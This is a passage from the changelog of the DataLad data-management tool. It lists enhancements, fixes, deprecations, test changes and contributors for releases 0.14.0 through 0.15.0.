[#5998](https://github.com/datalad/datalad/pull/5998) ([@mih](https://github.com/mih))\n\n#### 🧪 Tests\n\n- BF(TST): use sys.executable, mark test_ria_basics.test_url_keys as requiring network [#5986](https://github.com/datalad/datalad/pull/5986) ([@yarikoptic](https://github.com/yarikoptic))\n\n#### Authors: 3\n\n- John T. Wodder II ([@jwodder](https://github.com/jwodder))\n- Michael Hanke ([@mih](https://github.com/mih))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.15.0 (Tue Sep 14 2021) -- We miss you Kyle!\n\n#### Enhancements and new features\n\n- Command execution is now performed by a new `Runner` implementation that is\n no longer based on the `asyncio` framework, which was found to exhibit\n fragile performance in interaction with other `asyncio`-using code, such as\n Jupyter notebooks. The new implementation is based on threads. It also supports\n the specification of \"protocols\" that were introduced with the switch to the\n `asyncio` implementation in 0.14.0. ([#5667][])\n\n- `clone` now supports arbitrary URL transformations based on regular\n expressions. One or more transformation steps can be defined via\n `datalad.clone.url-substitute.<label>` configuration settings. The feature can\n be (and is now) used to support convenience mappings, such as\n `https://osf.io/q8xnk/` (displayed in a browser window) to `osf://q8xnk`\n (clonable via the `datalad-osf` extension). ([#5749][])\n\n- Homogenize SSH use and configurability between DataLad and git-annex, by\n instructing git-annex to use DataLad's `sshrun` for SSH calls (instead of SSH\n directly). ([#5389][])\n\n- The ORA special remote has received several new features:\n\n - It now supports a `push-url` setting as an alternative to `url` for write\n access. An analogous parameter was also added to `create-sibling-ria`.\n ([#5420][], [#5428][])\n\n - Access of RIA stores now performs homogeneous availability checks,\n regardless of access protocol. Before, broken HTTP-based access due to\n misspecified URLs could have gone unnoticed. ([#5459][], [#5672][])\n\n - Error reporting was introduced to inform about undesirable conditions in\n remote RIA stores. 
([#5683][])\n\n- `create-sibling-ria` now supports `--alias` for the specification of a\n convenience dataset alias name in a RIA store. ([#5592][])\n\n- Analog to `git commit`, `save` now features an `--amend` mode to support\n incremental updates of a dataset state. ([#5430][])\n\n- `run` now supports a dry-run mode that can be used to inspect the result of\n parameter expansion on the effective command to ease the composition of more\n complicated command lines. ([#5539][])\n\n- `run` now supports a `--assume-ready` switch to avoid the (possibly\n expensive) preparation of inputs and outputs with large datasets that have\n already been readied through other means. ([#5431][])\n\n- `update` now features `--how` and `--how-subds` parameters to configure how\n an update shall be performed. Supported modes are `fetch` (unchanged\n default), and `merge` (previously also possible via `--merge`), but also new\n strategies like `reset` or `checkout`. ([#5534][])\n\n- `update` has a new `--follow=parentds-lazy` mode that only performs a fetch\n operation in subdatasets when the desired commit is not yet present. During\n recursive updates involving many subdatasets this can substantially speed up\n performance. ([#5474][])\n\n- DataLad's command line API can now report the version for individual commands\n via `datalad <cmd> --version`. The output has been homogenized to\n `<providing package> <version>`. ([#5543][])\n\n- `create-sibling` now logs information on an auto-generated sibling name, in\n the case that no `--name/-s` was provided. ([#5550][])\n\n- `create-sibling-github` has been updated to emit result records like any\n standard DataLad command. Previously it was implemented as a \"plugin\", which\n did not support all standard API parameters. ([#5551][])\n\n- `copy-file` now also works with content-less files in datasets on crippled\n filesystems (adjusted mode), when a recent enough git-annex (8.20210428 or\n later) is available. ([#5630][])\n\n- `addurls` can now be instructed how to behave in the event of file name\n collision via a new parameter `--on-collision`. ([#5675][])\n\n- `addurls` reporting now informs which particular subdatasets were created.\n ([#5689][])\n\n- Credentials can now be provided or overwritten via all means supported by\n `ConfigManager`. Importantly, `datalad.credential.<name>.<field>`\n configuration settings and analog specification via environment variables are\n now supported (rather than custom environment variables only). Previous\n specification methods are still supported too. ([#5680][])\n\n- A new `datalad.credentials.force-ask` configuration flag can now be used to\n force re-entry of already known credentials. This simplifies credential\n updates without having to use an approach native to individual credential\n stores. ([#5777][])\n\n- Suppression of rendering repeated similar results is now configurable via the\n configuration switches `datalad.ui.suppress-similar-results` (bool), and\n `datalad.ui.suppress-similar-results-threshold` (int). ([#5681][])\n\n- The performance of `status` and similar functionality when determining local\n file availability has been improved. ([#5692][])\n\n- `push` now renders a result summary on completion. ([#5696][])\n\n- A dedicated info log message indicates when dataset repositories are\n subjected to an annex version upgrade. ([#5698][])\n\n- Error reporting improvements:\n\n - The `NoDatasetFound` exception now provides information for which purpose a\n dataset is required. 
([#5708][])\n\n - Wording of the `MissingExternalDependency` error was rephrased to account\n for cases of non-functional installations. ([#5803][])\n\n - `push` reports when a `--to` parameter specification was (likely)\n forgotten. ([#5726][])\n\n - Detailed information is now given when DataLad fails to obtain a lock for\n credential entry in a timely fashion. Previously only a generic debug log\n message was emitted. ([#5884][])\n\n - Clarified error message when `create-sibling-gitlab` was called without\n `--project`. ([#5907][])\n\n- `add-readme` now provides a README template with more information on the\n nature and use of DataLad datasets. A README file is no longer annex'ed by\n default, but can be annex'ed using the new `--annex` switch. ([#5723][], [#5725][])\n\n- `clean` now supports a `--dry-run` mode to inform about cleanable content.\n ([#5738][])\n\n- A new configuration setting `datalad.locations.locks` can be used to control\n the placement of lock files. ([#5740][])\n\n- `wtf` now also reports branch names and states. ([#5804][])\n\n- `AnnexRepo.whereis()` now supports batch mode. ([#5533][])\n\n#### Deprecations and removals\n\n- The minimum supported git-annex version is now 8.20200309. ([#5512][])\n\n- ORA special remote configuration items `ssh-host` and `base-path` are\n deprecated. They are completely replaced by `ria+<protocol>://` URL\n specifications. ([#5425][])\n\n- The deprecated `no_annex` parameter of `create()` was removed from the Python\n API. ([#5441][])\n\n- The unused `GitRepo.pull()` method has been removed. ([#5558][])\n\n- Residual support for \"plugins\" (a mechanism used before DataLad supported\n extensions) was removed. This includes the configuration switches\n `datalad.locations.{system,user}-plugins`. ([#5554][], [#5564][])\n\n- Several features and commands have been moved to the `datalad-deprecated`\n package. This package must now be installed to keep using this\n functionality.\n\n - The `publish` command. Use `push` instead. ([#5837][])\n\n - The `ls` command. ([#5569][])\n\n - The web UI that is deployable via `datalad create-sibling --ui`. ([#5555][])\n\n - The \"automagic IO\" feature. ([#5577][])\n\n- `AnnexRepo.copy_to()` has been deprecated. The `push` command should be used\n instead. ([#5560][])\n\n- `AnnexRepo.sync()` has been deprecated. `AnnexRepo.call_annex(['sync', ...])`\n should be used instead. ([#5461][])\n\n- All `GitRepo.*_submodule()` methods have been deprecated and will be removed\n in a future release. ([#5559][])\n\n- `create-sibling-github`'s `--dryrun` switch was deprecated, use `--dry-run` instead.\n ([#5551][])\n\n- The `datalad --pbs-runner` option has been deprecated, use `condor_run`\n (or similar) instead. ([#5956][])\n\n#### 🐛 Fixes\n\n- Prevent invalid declaration of a publication dependency for 'origin' on any\n auto-detected ORA special remotes, when cloning from a RIA store. An ORA\n remote is now checked to verify that it actually points to the RIA store the clone was\n made from. ([#5415][])\n\n- The ORA special remote implementation has received several fixes:\n\n - It can now handle HTTP redirects. ([#5792][])\n\n - Prevents failure when URL-type annex keys contain the '/' character.\n ([#5823][])\n\n - Properly supports the specification of usernames, passwords and ports in\n `ria+<protocol>://` URLs. 
([#5902][])\n\n- It is now possible to specifically select the default (or generic) result\n renderer via `datalad -f default` and with that override a `tailored` result\n renderer that may be preconfigured for a particular command. ([#5476][])\n\n- Starting with 0.14.0, original URLs given to `clone` were recorded in a\n subdataset record. This was initially done in a second commit, leading to\n inflation of commits and slowdown in superdatasets with many subdatasets. Such\n subdataset record annotation is now collapsed into a single commit.\n ([#5480][])\n\n- `run` no longer removes leading empty directories as part of the output\n preparation. This was surprising behavior for commands that do not ensure on\n their own that output directories exist. ([#5492][])\n\n- A potentially existing `message` property is no longer removed when using the\n `json` or `json_pp` result renderer to avoid undesired withholding of\n relevant information. ([#5536][])\n\n- `subdatasets` now reports `state=present`, rather than `state=clean`, for\n installed subdatasets to complement `state=absent` reports for uninstalled\n datasets. ([#5655][])\n\n- `create-sibling-ria` now executes commands with a consistent environment\n setup that matches all other command execution in other DataLad commands.\n ([#5682][])\n\n- `save` no longer saves unspecified subdatasets when called with an explicit\n path (list). The fix required a behavior change of\n `GitRepo.get_content_info()` in its interpretation of `None` vs. `[]` path\n argument values that now aligns the behavior of `GitRepo.diff|status()` with\n their respective documentation. ([#5693][])\n\n- `get` now prefers the location of a subdataset that is recorded in a\n superdataset's `.gitmodules` record. Previously, DataLad tried to obtain a\n subdataset from an assumed checkout of the superdataset's origin. This new\n default order is (re-)configurable via the\n `datalad.get.subdataset-source-candidate-<priority-label>` configuration\n mechanism. ([#5760][])\n\n- `create-sibling-gitlab` no longer skips the root dataset when `.` is given as\n a path. ([#5789][])\n\n- `siblings` now rejects a value given to `--as-common-datasrc` that clashes\n with the respective Git remote. ([#5805][])\n\n- The usage synopsis reported by `siblings` now lists all supported actions.\n ([#5913][])\n\n- `siblings` now renders non-ok results to avoid silent failure. ([#5915][])\n\n- `.gitattributes` file manipulations no longer leave the file without a\n trailing newline. ([#5847][])\n\n- Prevent crash when trying to delete a non-existing keyring credential field.\n ([#5892][])\n\n- git-annex is no longer called with an unconditional `annex.retry=3`\n configuration. Instead, this parameterization is now limited to `annex get`\n and `annex copy` calls. ([#5904][])\n\n#### 🧪 Tests\n\n- `file://` URLs are no longer the predominant test case for `AnnexRepo`\n functionality. A built-in HTTP server is now used in most cases. 
([#5332][])\n\n---\n\n# 0.14.8 (Sun Sep 12 2021)\n\n#### 🐛 Bug Fix\n\n- BF: add-archive-content on .xz and other non-.gz stream compressed files [#5930](https://github.com/datalad/datalad/pull/5930) ([@yarikoptic](https://github.com/yarikoptic))\n- BF(UX): do not keep logging ERROR possibly present in progress records [#5936](https://github.com/datalad/datalad/pull/5936) ([@yarikoptic](https://github.com/yarikoptic))\n- Annotate datalad_core as not needing actual data -- just uses annex whereis [#5971](https://github.com/datalad/datalad/pull/5971) ([@yarikoptic](https://github.com/yarikoptic))\n- BF: limit CMD_MAX_ARG if obnoxious value is encountered. [#5945](https://github.com/datalad/datalad/pull/5945) ([@yarikoptic](https://github.com/yarikoptic))\n- Download session/credentials locking -- inform user if locking is \"failing\" to be obtained, fail upon ~5min timeout [#5884](https://github.com/datalad/datalad/pull/5884) ([@yarikoptic](https://github.com/yarikoptic))\n- Render siblings()'s non-ok results with the default renderer [#5915](https://github.com/datalad/datalad/pull/5915) ([@mih](https://github.com/mih))\n- BF: do not crash, just skip whenever trying to delete non existing field in the underlying keyring [#5892](https://github.com/datalad/datalad/pull/5892) ([@yarikoptic](https://github.com/yarikoptic))\n- Fix argument-spec for `siblings` and improve usage synopsis [#5913](https://github.com/datalad/datalad/pull/5913) ([@mih](https://github.com/mih))\n- Clarify error message re unspecified gitlab project [#5907](https://github.com/datalad/datalad/pull/5907) ([@mih](https://github.com/mih))\n- Support username, password and port specification in RIA URLs [#5902](https://github.com/datalad/datalad/pull/5902) ([@mih](https://github.com/mih))\n- BF: take path from SSHRI, test URLs not only on Windows [#5881](https://github.com/datalad/datalad/pull/5881) ([@yarikoptic](https://github.com/yarikoptic))\n- ENH(UX): warn user if keyring returned a \"null\" keyring [#5875](https://github.com/datalad/datalad/pull/5875) ([@yarikoptic](https://github.com/yarikoptic))\n- ENH(UX): state original purpose in NoDatasetFound exception + detail it for get [#5708](https://github.com/datalad/datalad/pull/5708) ([@yarikoptic](https://github.com/yarikoptic))\n\n#### ⚠️ Pushed to `maint`\n\n- Merge branch 'bf-http-headers-agent' into maint ([@yarikoptic](https://github.com/yarikoptic))\n- RF(BF?)+DOC: provide User-Agent to entire session headers + use those if provided ([@yarikoptic](https://github.com/yarikoptic))\n\n#### 🏠 Internal\n\n- Pass `--no-changelog` to `auto shipit` if changelog already has entry [#5952](https://github.com/datalad/datalad/pull/5952) ([@jwodder](https://github.com/jwodder))\n- Add isort config to match current convention + run isort via pre-commit (if configured) [#5923](https://github.com/datalad/datalad/pull/5923) ([@jwodder](https://github.com/jwodder))\n- .travis.yml: use python -m {nose,coverage} invocations, and always show combined report [#5888](https://github.com/datalad/datalad/pull/5888) ([@yarikoptic](https://github.com/yarikoptic))\n- Add project URLs into the package metadata for convenience links on Pypi [#5866](https://github.com/datalad/datalad/pull/5866) ([@adswa](https://github.com/adswa) [@yarikoptic](https://github.com/yarikoptic))\n\n#### 🧪 Tests\n\n- BF: do use OBSCURE_FILENAME instead of hardcoded unicode [#5944](https://github.com/datalad/datalad/pull/5944) ([@yarikoptic](https://github.com/yarikoptic))\n- BF(TST): Skip testing for having PID listed 
if no psutil [#5920](https://github.com/datalad/datalad/pull/5920) ([@yarikoptic](https://github.com/yarikoptic))\n- BF(TST): Boost version of git-annex to 8.20201129 to test an error message [#5894](https://github.com/datalad/datalad/pull/5894) ([@yarikoptic](https://github.com/yarikoptic))\n\n#### Authors: 4\n\n- Adina Wagner ([@adswa](https://github.com/adswa))\n- John T. Wodder II ([@jwodder](https://github.com/jwodder))\n- Michael Hanke ([@mih](https://github.com/mih))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.14.7 (Tue Aug 03 2021)\n\n#### 🐛 Bug Fix\n\n- UX: When two or more clone URL templates are found, error out more gracefully [#5839](https://github.com/datalad/datalad/pull/5839) ([@adswa](https://github.com/adswa))\n- BF: http_auth - follow redirect (just 1) to re-authenticate after initial attempt [#5852](https://github.com/datalad/datalad/pull/5852) ([@yarikoptic](https://github.com/yarikoptic))\n- addurls Formatter - provide value repr in exception [#5850](https://github.com/datalad/datalad/pull/5850) ([@yarikoptic](https://github.com/yarikoptic))\n- ENH: allow for \"patch\" level semver for \"master\" branch [#5839](https://github.com/datalad/datalad/pull/5839) ([@yarikoptic](https://github.com/yarikoptic))\n- BF: Report info from annex JSON error message in CommandError [#5809](https://github.com/datalad/datalad/pull/5809) ([@mih](https://github.com/mih))\n- RF(TST): do not test for no EASY and pkg_resources in shims [#5817](https://github.com/datalad/datalad/pull/5817) ([@yarikoptic](https://github.com/yarikoptic))\n- http downloaders: Provide custom informative User-Agent, do not claim to be \"Authenticated access\" [#5802](https://github.com/datalad/datalad/pull/5802) ([@yarikoptic](https://github.com/yarikoptic))\n- ENH(UX,DX): inform user with a warning if version is 0+unknown [#5787](https://github.com/datalad/datalad/pull/5787) ([@yarikoptic](https://github.com/yarikoptic))\n- shell-completion: add argcomplete to 'misc' extra_depends, log an ERROR if argcomplete fails to import [#5781](https://github.com/datalad/datalad/pull/5781) ([@yarikoptic](https://github.com/yarikoptic))\n- ENH (UX): add python-gitlab dependency [#5776](https://github.com/datalad/datalad/pull/5776) ([email protected])\n\n#### 🏠 Internal\n\n- BF: Fix reported paths in ORA remote [#5821](https://github.com/datalad/datalad/pull/5821) ([@adswa](https://github.com/adswa))\n- BF: import importlib.metadata not importlib_metadata whenever available [#5818](https://github.com/datalad/datalad/pull/5818) ([@yarikoptic](https://github.com/yarikoptic))\n\n#### 🧪 Tests\n\n- TST: set --allow-unrelated-histories in the mk_push_target setup for Windows [#5855](https://github.com/datalad/datalad/pull/5855) ([@adswa](https://github.com/adswa))\n- Tests: Allow for version to contain + as a separator and provide more information for version related comparisons [#5786](https://github.com/datalad/datalad/pull/5786) ([@yarikoptic](https://github.com/yarikoptic))\n\n#### Authors: 4\n\n- Adina Wagner ([@adswa](https://github.com/adswa))\n- Michael Hanke ([@mih](https://github.com/mih))\n- Stephan Heunis ([@jsheunis](https://github.com/jsheunis))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.14.6 (Sun Jun 27 2021)\n\n#### 🏠 Internal\n\n- BF: update changelog conversion from .md to .rst (for sphinx) [#5757](https://github.com/datalad/datalad/pull/5757) ([@yarikoptic](https://github.com/yarikoptic) [@jwodder](https://github.com/jwodder))\n\n#### 
Authors: 2\n\n- John T. Wodder II ([@jwodder](https://github.com/jwodder))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.14.5 (Mon Jun 21 2021)\n\n#### 🐛 Bug Fix\n\n- BF(TST): parallel - take longer for producer to produce [#5747](https://github.com/datalad/datalad/pull/5747) ([@yarikoptic](https://github.com/yarikoptic))\n- add --on-failure default value and document it [#5690](https://github.com/datalad/datalad/pull/5690) ([@christian-monch](https://github.com/christian-monch) [@yarikoptic](https://github.com/yarikoptic))\n- ENH: harmonize \"purpose\" statements to imperative form [#5733](https://github.com/datalad/datalad/pull/5733) ([@yarikoptic](https://github.com/yarikoptic))\n- ENH(TST): populate heavy tree with 100 unique keys (not just 1) among 10,000 [#5734](https://github.com/datalad/datalad/pull/5734) ([@yarikoptic](https://github.com/yarikoptic))\n- BF: do not use .acquired - just get state from acquire() [#5718](https://github.com/datalad/datalad/pull/5718) ([@yarikoptic](https://github.com/yarikoptic))\n- BF: account for annex now \"scanning for annexed\" instead of \"unlocked\" files [#5705](https://github.com/datalad/datalad/pull/5705) ([@yarikoptic](https://github.com/yarikoptic))\n- interface: Don't repeat custom summary for non-generator results [#5688](https://github.com/datalad/datalad/pull/5688) ([@kyleam](https://github.com/kyleam))\n- RF: just pip install datalad-installer [#5676](https://github.com/datalad/datalad/pull/5676) ([@yarikoptic](https://github.com/yarikoptic))\n- DOC: addurls.extract: Drop mention of removed 'stream' parameter [#5690](https://github.com/datalad/datalad/pull/5690) ([@kyleam](https://github.com/kyleam))\n- Merge pull request #5674 from kyleam/test-addurls-copy-fix [#5674](https://github.com/datalad/datalad/pull/5674) ([@kyleam](https://github.com/kyleam))\n- Merge pull request #5663 from kyleam/status-ds-equal-path [#5663](https://github.com/datalad/datalad/pull/5663) ([@kyleam](https://github.com/kyleam))\n- Merge pull request #5671 from kyleam/update-fetch-fail [#5671](https://github.com/datalad/datalad/pull/5671) ([@kyleam](https://github.com/kyleam))\n- BF: update: Honor --on-failure if fetch fails [#5671](https://github.com/datalad/datalad/pull/5671) ([@kyleam](https://github.com/kyleam))\n- RF: update: Avoid fetch's deprecated kwargs [#5671](https://github.com/datalad/datalad/pull/5671) ([@kyleam](https://github.com/kyleam))\n- CLN: update: Drop an unused import [#5671](https://github.com/datalad/datalad/pull/5671) ([@kyleam](https://github.com/kyleam))\n- Merge pull request #5664 from kyleam/addurls-better-url-parts-error [#5664](https://github.com/datalad/datalad/pull/5664) ([@kyleam](https://github.com/kyleam))\n- Merge pull request #5661 from kyleam/sphinx-fix-plugin-refs [#5661](https://github.com/datalad/datalad/pull/5661) ([@kyleam](https://github.com/kyleam))\n- BF: status: Provide special treatment of \"this dataset\" path [#5663](https://github.com/datalad/datalad/pull/5663) ([@kyleam](https://github.com/kyleam))\n- BF: addurls: Provide better placeholder error for special keys [#5664](https://github.com/datalad/datalad/pull/5664) ([@kyleam](https://github.com/kyleam))\n- RF: addurls: Simply construction of placeholder exception message [#5664](https://github.com/datalad/datalad/pull/5664) ([@kyleam](https://github.com/kyleam))\n- RF: addurls._get_placeholder_exception: Rename a parameter [#5664](https://github.com/datalad/datalad/pull/5664) ([@kyleam](https://github.com/kyleam))\n- RF: 
status: Avoid repeated Dataset.path access [#5663](https://github.com/datalad/datalad/pull/5663) ([@kyleam](https://github.com/kyleam))\n- DOC: Reference plugins via datalad.api [#5661](https://github.com/datalad/datalad/pull/5661) ([@kyleam](https://github.com/kyleam))\n- download-url: Set up datalad special remote if needed [#5648](https://github.com/datalad/datalad/pull/5648) ([@kyleam](https://github.com/kyleam) [@yarikoptic](https://github.com/yarikoptic))\n\n#### ⚠️ Pushed to `maint`\n\n- MNT: Post-release dance ([@kyleam](https://github.com/kyleam))\n\n#### 🏠 Internal\n\n- Switch to versioneer and auto [#5669](https://github.com/datalad/datalad/pull/5669) ([@jwodder](https://github.com/jwodder) [@yarikoptic](https://github.com/yarikoptic))\n- MNT: setup.py: Temporarily avoid Sphinx 4 [#5649](https://github.com/datalad/datalad/pull/5649) ([@kyleam](https://github.com/kyleam))\n\n#### 🧪 Tests\n\n- BF(TST): skip testing for showing \"Scanning for ...\" since not shown if too quick [#5727](https://github.com/datalad/datalad/pull/5727) ([@yarikoptic](https://github.com/yarikoptic))\n- Revert \"TST: test_partial_unlocked: Document and avoid recent git-annex failure\" [#5651](https://github.com/datalad/datalad/pull/5651) ([@kyleam](https://github.com/kyleam))\n\n#### Authors: 4\n\n- Christian Mönch ([@christian-monch](https://github.com/christian-monch))\n- John T. Wodder II ([@jwodder](https://github.com/jwodder))\n- Kyle Meyer ([@kyleam](https://github.com/kyleam))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.14.4 (May 10, 2021) -- .\n\n## Fixes\n\n- Following an internal call to `git-clone`, [clone][] assumed that\n the remote name was \"origin\", but this may not be the case if\n `clone.defaultRemoteName` is configured (available as of Git 2.30).\n ([#5572][])\n\n- Several test fixes, including updates for changes in git-annex.\n ([#5612][]) ([#5632][]) ([#5639][])\n\n\n# 0.14.3 (April 28, 2021) -- .\n\n## Fixes\n\n- For outputs that include a glob, [run][] didn't re-glob after\n executing the command, which is necessary to catch changes if\n `--explicit` or `--expand={outputs,both}` is specified. ([#5594][])\n\n- [run][] now gives an error result rather than a warning when an\n input glob doesn't match. ([#5594][])\n\n- The procedure for creating a RIA store checks for an existing\n ria-layout-version file and makes sure its version matches the\n desired version. This check wasn't done correctly for SSH hosts.\n ([#5607][])\n\n- A helper for transforming git-annex JSON records into DataLad\n results didn't account for the unusual case where the git-annex\n record doesn't have a \"file\" key. ([#5580][])\n\n- The test suite required updates for recent changes in PyGithub and\n git-annex. ([#5603][]) ([#5609][])\n\n## Enhancements and new features\n\n- The DataLad source repository has long had a\n tools/cmdline-completion helper. This functionality is now exposed\n as a command, `datalad shell-completion`. ([#5544][])\n\n\n# 0.14.2 (April 14, 2021) -- .\n\n## Fixes\n\n- [push][] now works bottom-up, pushing submodules first so that hooks\n on the remote can aggregate updated subdataset information. ([#5416][])\n\n- [run-procedure][] didn't ensure that the configuration of\n subdatasets was reloaded. 
([#5552][])\n\n\n# 0.14.1 (April 01, 2021) -- .\n\n## Fixes\n\n- The recent default branch changes on GitHub's side can lead to\n \"git-annex\" being selected over \"master\" as the default branch on\n GitHub when setting up a sibling with [create-sibling-github][]. To\n work around this, the current branch is now pushed first.\n ([#5010][])\n\n- The logic for reading in a JSON line from git-annex failed if the\n response exceeded the buffer size (256 KB on *nix systems).\n\n- Calling [unlock][] with a path of \".\" from within an untracked\n subdataset incorrectly aborted, complaining that the \"dataset\n containing given paths is not underneath the reference dataset\".\n ([#5458][])\n\n- [clone][] didn't account for the possibility of multiple accessible\n ORA remotes or the fact that none of them may be associated with the\n RIA store being cloned. ([#5488][])\n\n- [create-sibling-ria][] didn't call `git update-server-info` after\n setting up the remote repository and, as a result, the repository\n couldn't be fetched until something else (e.g., a push) triggered a\n call to `git update-server-info`. ([#5531][])\n\n- The parser for git-config output didn't properly handle multi-line\n values and got thrown off by unexpected and unrelated lines. ([#5509][])\n\n- The 0.14 release introduced regressions in the handling of progress\n bars for git-annex actions, including collapsing progress bars for\n concurrent operations. ([#5421][]) ([#5438][])\n\n- [save][] failed if the user configured Git's `diff.ignoreSubmodules`\n to a non-default value. ([#5453][])\n\n- A interprocess lock is now used to prevent a race between checking\n for an SSH socket's existence and creating it. ([#5466][])\n\n- If a Python procedure script is executable, [run-procedure][]\n invokes it directly rather than passing it to `sys.executable`. The\n non-executable Python procedures that ship with DataLad now include\n shebangs so that invoking them has a chance of working on file\n systems that present all files as executable. ([#5436][])\n\n- DataLad's wrapper around `argparse` failed if an underscore was used\n in a positional argument. ([#5525][])\n\n## Enhancements and new features\n\n- DataLad's method for mapping environment variables to configuration\n options (e.g., `DATALAD_FOO_X__Y` to `datalad.foo.x-y`) doesn't work\n if the subsection name (\"FOO\") has an underscore. This limitation\n can be sidestepped with the new `DATALAD_CONFIG_OVERRIDES_JSON`\n environment variable, which can be set to a JSON record of\n configuration values. ([#5505][])\n\n\n# 0.14.0 (February 02, 2021) -- .\n\n## Major refactoring and deprecations\n\n- Git versions below v2.19.1 are no longer supported. ([#4650][])\n\n- The minimum git-annex version is still 7.20190503, but, if you're on\n Windows (or use adjusted branches in general), please upgrade to at\n least 8.20200330 but ideally 8.20210127 to get subdataset-related\n fixes. ([#4292][]) ([#5290][])\n\n- The minimum supported version of Python is now 3.6. ([#4879][])\n\n- [publish][] is now deprecated in favor of [push][]. It will be\n removed in the 0.15.0 release at the earliest.\n\n- A new command runner was added in v0.13. Functionality related to\n the old runner has now been removed: `Runner`, `GitRunner`, and\n `run_gitcommand_on_file_list_chunks` from the `datalad.cmd` module\n along with the `datalad.tests.protocolremote`,\n `datalad.cmd.protocol`, and `datalad.cmd.protocol.prefix`\n configuration options. 
([#5229][])\n\n- The `--no-storage-sibling` switch of `create-sibling-ria` is\n deprecated in favor of `--storage-sibling=off` and will be removed\n in a later release. ([#5090][])\n\n- The `get_git_dir` static method of `GitRepo` is deprecated and will\n be removed in a later release. Use the `dot_git` attribute of an\n instance instead. ([#4597][])\n\n- The `ProcessAnnexProgressIndicators` helper from\n `datalad.support.annexrepo` has been removed. ([#5259][])\n\n- The `save` argument of [install][], a noop since v0.6.0, has been\n dropped. ([#5278][])\n\n- The `get_URLS` method of `AnnexCustomRemote` is deprecated and will\n be removed in a later release. ([#4955][])\n\n- `ConfigManager.get` now returns a single value rather than a tuple\n when there are multiple values for the same key, as very few callers\n correctly accounted for the possibility of a tuple return value.\n Callers can restore the old behavior by passing `get_all=True`.\n ([#4924][])\n\n- In 0.12.0, all of the `assure_*` functions in `datalad.utils` were\n renamed as `ensure_*`, keeping the old names around as compatibility\n aliases. The `assure_*` variants are now marked as deprecated and\n will be removed in a later release. ([#4908][])\n\n- The `datalad.interface.run` module, which was deprecated in 0.12.0\n and kept as a compatibility shim for `datalad.core.local.run`, has\n been removed. ([#4583][])\n\n- The `saver` argument of `datalad.core.local.run.run_command`, marked\n as obsolete in 0.12.0, has been removed. ([#4583][])\n\n- The `dataset_only` argument of the `ConfigManager` class was\n deprecated in 0.12 and has now been removed. ([#4828][])\n\n- The `linux_distribution_name`, `linux_distribution_release`, and\n `on_debian_wheezy` attributes in `datalad.utils` are no longer set\n at import time and will be removed in a later release. Use\n `datalad.utils.get_linux_distribution` instead. ([#4696][])\n\n- `datalad.distribution.clone`, which was marked as obsolete in v0.12\n in favor of `datalad.core.distributed.clone`, has been removed.\n ([#4904][])\n\n- `datalad.support.annexrepo.N_AUTO_JOBS`, announced as deprecated in\n v0.12.6, has been removed. ([#4904][])\n\n- The `compat` parameter of `GitRepo.get_submodules`, added in v0.12\n as a temporary compatibility layer, has been removed. ([#4904][])\n\n- The long-deprecated (and non-functional) `url` parameter of\n `GitRepo.__init__` has been removed. ([#5342][])\n\n## Fixes\n\n- Cloning onto a system that enters adjusted branches by default (as\n Windows does) did not properly record the clone URL. ([#5128][])\n\n- The RIA-specific handling after calling [clone][] was correctly\n triggered by `ria+http` URLs but not `ria+https` URLs. ([#4977][])\n\n- If the registered commit wasn't found when cloning a subdataset, the\n failed attempt was left around. ([#5391][])\n\n- The remote calls to `cp` and `chmod` in [create-sibling][] were not\n portable and failed on macOS. ([#5108][])\n\n- A more reliable check is now done to decide if configuration files\n need to be reloaded. ([#5276][])\n\n- The internal command runner's handling of the event loop has been\n improved to play nicer with outside applications and scripts that\n use asyncio. ([#5350][]) ([#5367][])\n\n## Enhancements and new features\n\n- The subdataset handling for adjusted branches, which is particularly\n important on Windows where git-annex enters an adjusted branch by\n default, has been improved. 
A core piece of the new approach is\n registering the commit of the primary branch, not its checked out\n adjusted branch, in the superdataset. Note: This means that `git\n status` will always consider a subdataset on an adjusted branch as\n dirty while `datalad status` will look more closely and see if the\n tip of the primary branch matches the registered commit.\n ([#5241][])\n\n- The performance of the [subdatasets][] command has been improved,\n with substantial speedups for recursive processing of many\n subdatasets. ([#4868][]) ([#5076][])\n\n- Adding new subdatasets via [save][] has been sped up. ([#4793][])\n\n- [get][], [save][], and [addurls][] gained support for parallel\n operations that can be enabled via the `--jobs` command-line option\n or the new `datalad.runtime.max-jobs` configuration option. ([#5022][])\n\n- [addurls][]\n - learned how to read data from standard input. ([#4669][])\n - now supports tab-separated input. ([#4845][])\n - now lets Python callers pass in a list of records rather than a\n file name. ([#5285][])\n - gained a `--drop-after` switch that signals to drop a file's\n content after downloading and adding it to the annex. ([#5081][])\n - is now able to construct a tree of files from known checksums\n without downloading content via its new `--key` option. ([#5184][])\n - records the URL file in the commit message as provided by the\n caller rather than using the resolved absolute path. ([#5091][])\n - is now speedier. ([#4867][]) ([#5022][])\n\n- [create-sibling-github][] learned how to create private repositories\n (thanks to Nolan Nichols). ([#4769][])\n\n- [create-sibling-ria][] gained a `--storage-sibling` option. When\n `--storage-sibling=only` is specified, the storage sibling is\n created without an accompanying Git sibling. This enables using\n hosts without Git installed for storage. ([#5090][])\n\n- The download machinery (and thus the `datalad` special remote)\n gained support for a new scheme, `shub://`, which follows the same\n format used by `singularity run` and friends. In contrast to the\n short-lived URLs obtained by querying Singularity Hub directly,\n `shub://` URLs are suitable for registering with git-annex. ([#4816][])\n\n- A provider is now included for https://registry-1.docker.io URLs.\n This is useful for storing an image's blobs in a dataset and\n registering the URLs with git-annex. ([#5129][])\n\n- The `add-readme` command now links to the [DataLad\n handbook][handbook] rather than <http://docs.datalad.org>. ([#4991][])\n\n- New option `datalad.locations.extra-procedures` specifies an\n additional location that should be searched for procedures. ([#5156][])\n\n- The class for handling configuration values, `ConfigManager`, now\n takes a lock before writes to allow for multiple processes to modify\n the configuration of a dataset. ([#4829][])\n\n- [clone][] now records the original, unresolved URL for a subdataset\n under `submodule.<name>.datalad-url` in the parent's .gitmodules,\n enabling later [get][] calls to use the original URL. This is\n particularly useful for `ria+` URLs. ([#5346][])\n\n- Installing a subdataset now uses custom handling rather than calling\n `git submodule update --init`. This avoids some locking issues when\n running [get][] in parallel and enables more accurate source URLs to\n be recorded. ([#4853][])\n\n- 